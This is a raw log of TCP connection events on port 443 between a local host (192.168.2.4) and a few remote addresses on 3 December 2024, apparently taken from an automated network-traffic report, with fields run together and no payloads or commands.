                                            Dec 3, 2024 09:58:04.539207935 CET49808443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.539212942 CET4434980813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.541955948 CET49812443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.541994095 CET4434981213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.542052984 CET49812443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.542201042 CET49812443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.542220116 CET4434981213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.547163963 CET4434981113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.547842026 CET49811443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.547871113 CET4434981113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.548259020 CET49811443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.548261881 CET4434981113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.637828112 CET4434980713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.637902021 CET4434980713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.637985945 CET49807443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.638179064 CET49807443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.638191938 CET4434980713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.638200045 CET49807443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.638205051 CET4434980713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.640760899 CET49813443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.640800953 CET4434981313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.640871048 CET49813443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.640993118 CET49813443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.641005039 CET4434981313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.642915964 CET49784443192.168.2.4172.217.21.36
                                            Dec 3, 2024 09:58:04.642925978 CET44349784172.217.21.36192.168.2.4
                                            Dec 3, 2024 09:58:04.697009087 CET4434980913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.697071075 CET4434980913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.697196007 CET49809443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.697235107 CET49809443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.697235107 CET49809443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.697253942 CET4434980913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.697263956 CET4434980913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.699107885 CET49814443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.699124098 CET4434981413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.699186087 CET49814443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.699291945 CET49814443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.699304104 CET4434981413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.754384995 CET4434981013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.754439116 CET4434981013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.754519939 CET49810443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.755835056 CET49810443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.755844116 CET4434981013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.755852938 CET49810443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.755856991 CET4434981013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.758282900 CET49815443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.758316994 CET4434981513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:04.758392096 CET49815443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.758538961 CET49815443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:04.758549929 CET4434981513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:05.000499964 CET4434981113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:05.000555992 CET4434981113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:05.000616074 CET49811443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:05.000900984 CET49811443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:05.000919104 CET4434981113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:05.000929117 CET49811443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:05.000935078 CET4434981113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:05.003293991 CET49816443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:05.003333092 CET4434981613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:05.003413916 CET49816443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:05.003571033 CET49816443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:05.003585100 CET4434981613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:06.257996082 CET4434981213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:06.258501053 CET49812443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:06.258528948 CET4434981213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:06.259010077 CET49812443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:06.259015083 CET4434981213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:06.425040960 CET4434981313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:06.425523996 CET49813443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:06.425558090 CET4434981313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:06.425973892 CET49813443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:06.425978899 CET4434981313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:06.478908062 CET4434981413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:06.479336977 CET49814443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:06.479352951 CET4434981413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:06.479933977 CET49814443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:06.479938984 CET4434981413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:06.601706028 CET4434981513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:06.602621078 CET49815443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:06.602622032 CET49815443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:06.602653027 CET4434981513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:06.602673054 CET4434981513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:06.693602085 CET4434981213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:06.693662882 CET4434981213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:06.693716049 CET49812443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:06.694160938 CET49812443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:06.694176912 CET4434981213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:06.694186926 CET49812443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:06.694196939 CET4434981213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:06.697546959 CET49817443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:06.697604895 CET4434981713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:06.697679043 CET49817443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:06.697822094 CET49817443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:06.697837114 CET4434981713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:06.783735991 CET4434981613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:06.784097910 CET49816443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:06.784116983 CET4434981613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:06.784527063 CET49816443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:06.784532070 CET4434981613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:06.870935917 CET4434981313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:06.871012926 CET4434981313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:06.871202946 CET49813443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:06.871249914 CET49813443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:06.871249914 CET49813443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:06.871275902 CET4434981313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:06.871288061 CET4434981313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:06.874001026 CET49818443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:06.874047995 CET4434981813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:06.874128103 CET49818443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:06.874321938 CET49818443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:06.874335051 CET4434981813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:06.924452066 CET4434981413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:06.924519062 CET4434981413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:06.924731970 CET49814443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:06.924767017 CET49814443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:06.924767017 CET49814443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:06.924784899 CET4434981413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:06.924792051 CET4434981413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:06.927243948 CET49819443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:06.927294016 CET4434981913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:06.927380085 CET49819443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:06.927530050 CET49819443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:06.927544117 CET4434981913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:07.054820061 CET4434981513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:07.054897070 CET4434981513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:07.055089951 CET49815443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:07.055143118 CET49815443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:07.055143118 CET49815443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:07.055164099 CET4434981513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:07.055171967 CET4434981513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:07.057487011 CET49820443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:07.057529926 CET4434982013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:07.057588100 CET49820443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:07.057707071 CET49820443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:07.057723045 CET4434982013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:07.227684021 CET4434981613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:07.227756023 CET4434981613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:07.227828026 CET49816443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:07.228028059 CET49816443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:07.228048086 CET4434981613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:07.228064060 CET49816443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:07.228070021 CET4434981613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:07.230843067 CET49821443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:07.230887890 CET4434982113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:07.230992079 CET49821443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:07.231183052 CET49821443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:07.231194973 CET4434982113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:08.500574112 CET4434981713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:08.501316071 CET49817443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:08.501342058 CET4434981713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:08.501776934 CET49817443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:08.501780987 CET4434981713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:08.732553959 CET4434981813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:08.732935905 CET49818443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:08.732959032 CET4434981813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:08.733306885 CET49818443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:08.733311892 CET4434981813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:08.752650976 CET4434981913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:08.753037930 CET49819443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:08.753051043 CET4434981913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:08.753411055 CET49819443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:08.753415108 CET4434981913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:08.909358978 CET4434982013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:08.909742117 CET49820443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:08.909755945 CET4434982013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:08.910060883 CET49820443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:08.910067081 CET4434982013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:08.936469078 CET4434981713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:08.936520100 CET4434981713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:08.936638117 CET49817443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:08.936816931 CET49817443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:08.936830044 CET4434981713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:08.936839104 CET49817443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:08.936844110 CET4434981713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:08.939872026 CET49822443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:08.939903021 CET4434982213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:08.939977884 CET49822443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:08.940104961 CET49822443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:08.940116882 CET4434982213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:09.155103922 CET4434982113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:09.155456066 CET49821443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:09.155482054 CET4434982113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:09.156306028 CET49821443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:09.156310081 CET4434982113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:09.181420088 CET4434981813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:09.181477070 CET4434981813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:09.181529999 CET49818443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:09.181680918 CET49818443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:09.181699991 CET4434981813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:09.181714058 CET49818443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:09.181718111 CET4434981813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:09.183789968 CET49823443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:09.183811903 CET4434982313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:09.183887959 CET49823443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:09.184015989 CET49823443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:09.184026003 CET4434982313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:09.200829983 CET4434981913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:09.200886011 CET4434981913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:09.200938940 CET49819443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:09.201061010 CET49819443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:09.201071024 CET4434981913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:09.201083899 CET49819443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:09.201087952 CET4434981913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:09.202840090 CET49824443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:09.202872038 CET4434982413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:09.202928066 CET49824443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:09.203027964 CET49824443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:09.203038931 CET4434982413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:09.353584051 CET4434982013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:09.353636980 CET4434982013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:09.353679895 CET49820443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:09.353821993 CET49820443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:09.353821993 CET49820443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:09.353840113 CET4434982013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:09.353847980 CET4434982013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:09.356668949 CET49825443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:09.356703997 CET4434982513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:09.356779099 CET49825443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:09.356898069 CET49825443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:09.356909990 CET4434982513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:09.611902952 CET4434982113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:09.611949921 CET4434982113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:09.612015963 CET49821443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:09.612178087 CET49821443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:09.612190008 CET4434982113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:09.612199068 CET49821443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:09.612202883 CET4434982113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:09.614418030 CET49826443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:09.614432096 CET4434982613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:09.614512920 CET49826443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:09.614670992 CET49826443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:09.614680052 CET4434982613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:10.464014053 CET4434982213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:10.464622021 CET49822443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:10.464656115 CET4434982213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:10.465095997 CET49822443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:10.465101957 CET4434982213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:10.900449991 CET4434982213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:10.900507927 CET4434982213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:10.900562048 CET49822443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:10.900765896 CET49822443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:10.900784969 CET4434982213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:10.900793076 CET49822443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:10.900799036 CET4434982213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:10.903368950 CET49827443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:10.903410912 CET4434982713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:10.903489113 CET49827443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:10.903671026 CET49827443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:10.903683901 CET4434982713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:10.971503973 CET4434982313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:10.971885920 CET49823443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:10.971914053 CET4434982313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:10.972265959 CET49823443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:10.972270966 CET4434982313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:11.050096035 CET4434982413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:11.050414085 CET49824443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:11.050441027 CET4434982413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:11.050733089 CET49824443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:11.050739050 CET4434982413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:11.136867046 CET4434982513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:11.137222052 CET49825443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:11.137238026 CET4434982513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:11.137557030 CET49825443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:11.137561083 CET4434982513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:11.425543070 CET4434982313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:11.425601006 CET4434982313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:11.425652027 CET49823443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:11.425822020 CET49823443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:11.425846100 CET4434982313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:11.425858974 CET49823443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:11.425863981 CET4434982313.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:11.428548098 CET49828443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:11.428584099 CET4434982813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:11.428639889 CET49828443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:11.428749084 CET49828443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:11.428761959 CET4434982813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:11.470473051 CET4434982613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:11.470825911 CET49826443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:11.470850945 CET4434982613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:11.471178055 CET49826443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:11.471183062 CET4434982613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:11.503422022 CET4434982413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:11.503484011 CET4434982413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:11.503535986 CET49824443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:11.503662109 CET49824443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:11.503678083 CET4434982413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:11.503686905 CET49824443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:11.503691912 CET4434982413.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:11.505615950 CET49829443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:11.505654097 CET4434982913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:11.505727053 CET49829443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:11.505852938 CET49829443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:11.505863905 CET4434982913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:11.581482887 CET4434982513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:11.581545115 CET4434982513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:11.581604958 CET49825443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:11.581707001 CET49825443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:11.581718922 CET4434982513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:11.581727982 CET49825443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:11.581732988 CET4434982513.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:11.583581924 CET49830443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:11.583600044 CET4434983013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:11.583671093 CET49830443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:11.583786011 CET49830443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:11.583796978 CET4434983013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:11.923752069 CET4434982613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:11.923820019 CET4434982613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:11.923877954 CET49826443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:11.924016953 CET49826443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:11.924030066 CET4434982613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:11.924040079 CET49826443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:11.924045086 CET4434982613.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:11.926079988 CET49831443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:11.926109076 CET4434983113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:11.926177979 CET49831443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:11.926292896 CET49831443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:11.926302910 CET4434983113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:12.686273098 CET4434982713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:12.686785936 CET49827443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:12.686821938 CET4434982713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:12.687359095 CET49827443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:12.687365055 CET4434982713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.130887032 CET4434982713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.130960941 CET4434982713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.131011009 CET49827443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:13.131141901 CET49827443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:13.131162882 CET4434982713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.131176949 CET49827443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:13.131181955 CET4434982713.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.136465073 CET49832443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:13.136507034 CET4434983213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.136562109 CET49832443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:13.137211084 CET49832443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:13.137228966 CET4434983213.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.277439117 CET4434982813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.277887106 CET49828443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:13.277908087 CET4434982813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.278721094 CET49828443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:13.278726101 CET4434982813.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.294579029 CET4434982913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.294915915 CET49829443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:13.294945955 CET4434982913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.295335054 CET49829443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:13.295340061 CET4434982913.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.300602913 CET4434983013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.300898075 CET49830443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:13.300919056 CET4434983013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.301278114 CET49830443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:13.301282883 CET4434983013.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.704281092 CET4434983113.107.246.63192.168.2.4
                                            Dec 3, 2024 09:58:13.704747915 CET49831443192.168.2.413.107.246.63
                                            Dec 3, 2024 09:58:13.704767942 CET4434983113.107.246.63192.168.2.4
